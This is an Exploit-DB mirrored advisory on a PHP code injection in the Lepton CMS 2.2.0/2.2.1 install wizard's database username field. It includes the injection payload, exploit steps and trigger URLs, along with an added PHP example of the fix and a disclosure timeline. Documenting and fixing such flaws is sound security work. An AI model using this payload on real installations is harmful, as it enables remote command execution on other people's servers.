exploit-db-mirror/platforms/php/webapps/40248.txt
Offensive Security 29076928d8 DB: 2016-08-17
10 new exploits
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.lepton-cms.org
Product:
=================================
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but fully customizable Content Management System
(CMS).
Vulnerability Type:
===================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No input validation is performed on the "Database User" field when Lepton
CMS setup information is entered through the Install Wizard. The value is
written verbatim into "config.php", so a malicious user can inject arbitrary
PHP into that file, which allows remote command execution on the host system.
e.g.
In the database username field, enter a single quote to close the
"DB_USERNAME" value, then open our own PHP tags:
');?><?php exec(`calc.exe`);?>
Now in "config.php" the database username line becomes ===>
define('DB_USERNAME', '');?><?php exec(`calc.exe`);?>');
Lepton attempts a security check to disallow loading "config.php" more than
once per request. On line 3 of the "config.php" file we find:
///////////////////////////////////////////////////////////////////////////////////////////////////////
if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted to load \'config.php\' twice!! Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
///////////////////////////////////////////////////////////////////////////////////////////////////////////
However, the check sits on line 3, before "LEPTON_PATH" has been defined, so
its condition is never true and the access control is bypassed completely.
Now we can inject our own PHP code into the config, allowing remote command
execution or local/remote file includes etc...
Next, make an HTTP GET request to "http://victim-server/upload/install/save.php"
again and code execution will be achieved, or request "config.php" directly,
since the security check on line 3 of "config.php" that is meant to prevent
multiple HTTP requests to "config.php" does NOT work in any case.
In situations where an installation script is provided as part of some
default image, often made available as a convenience by hosting providers,
this can be used to gain code execution on the target system and bypass
whatever security access controls/restrictions etc. are in place.
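As an added example (not Lepton's own code; written here to illustrate the root cause and the fix), the snippet below contrasts splicing a raw username into a single-quoted PHP literal with emitting it through var_export(), adds a character whitelist for the database user name, and shows a reload guard that tests a constant which config.php defines itself, so that it can actually fire. The payload is the one quoted above, used as constructed input; LEPTON_CONFIG_LOADED and the function names are hypothetical.

```php
<?php
// Added example, not Lepton's code: two ways an install wizard can write a
// user-supplied database username into config.php, and a reload guard that works.

// Constructed input: the payload quoted in the advisory above.
$dbUser = "');?><?php exec(`calc.exe`);?>";

// Vulnerable composition: the raw value is spliced into a single-quoted PHP
// literal, so a quote in the value closes the literal and the rest is parsed as code.
function render_define_unsafe(string $name, string $value): string
{
    return "define('" . $name . "', '" . $value . "');";
}

// Hardened composition: var_export() emits a valid PHP string literal, escaping
// the quote and backslash characters that could otherwise close it. A "?>" inside
// a string token does not leave PHP mode, so the injected tags stay inert data.
function render_define_safe(string $name, string $value): string
{
    return 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ');';
}

// Defence in depth: restrict the username to characters a database account
// name realistically needs and reject everything else before writing anything.
function is_valid_db_username(string $value): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $value);
}

// The guard Lepton placed on line 3 of config.php tests a constant that nothing
// has defined yet, so it never fires. A working guard checks a constant that
// config.php itself defines immediately after the check (hypothetical name).
function render_config(string $dbUser): string
{
    if (!is_valid_db_username($dbUser)) {
        throw new InvalidArgumentException('Database user name contains characters that are not allowed');
    }
    $lines = [
        '<?php',
        "if (defined('LEPTON_CONFIG_LOADED')) { die('config.php must not be loaded twice'); }",
        "define('LEPTON_CONFIG_LOADED', true);",
        render_define_safe('DB_USERNAME', $dbUser),
    ];
    return implode("\n", $lines) . "\n";
}

// Compare the two renderings of the same payload, then show a valid install.
echo "unsafe: " . render_define_unsafe('DB_USERNAME', $dbUser) . "\n";
echo "safe:   " . render_define_safe('DB_USERNAME', $dbUser) . "\n";
var_dump(is_valid_db_username($dbUser));
echo render_config('lepton_app');
```

Run it with `php example.php`: the unsafe line reproduces the broken define shown in the advisory, the safe line keeps the whole payload inside one string literal, the whitelist rejects the payload outright, and the generated config defines its own guard constant so a second include really does die.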
References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
Exploit code(s):
===============
1) At step 4 of Lepton's Install Wizard, enter ');?><?php exec(`calc.exe`);?>
for the Database User name, then fill in the rest of the fields
2) Click "go to step 5", fill in the required fields, then click "Install LEPTON"
3) Make an HTTP GET request to:
http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
OR
http://localhost/LEPTON_stable_2.2.0/upload/config.php
BOOM pop calc.exe...
Disclosure Timeline:
===========================================================
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 (thanks Henri Salo)
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX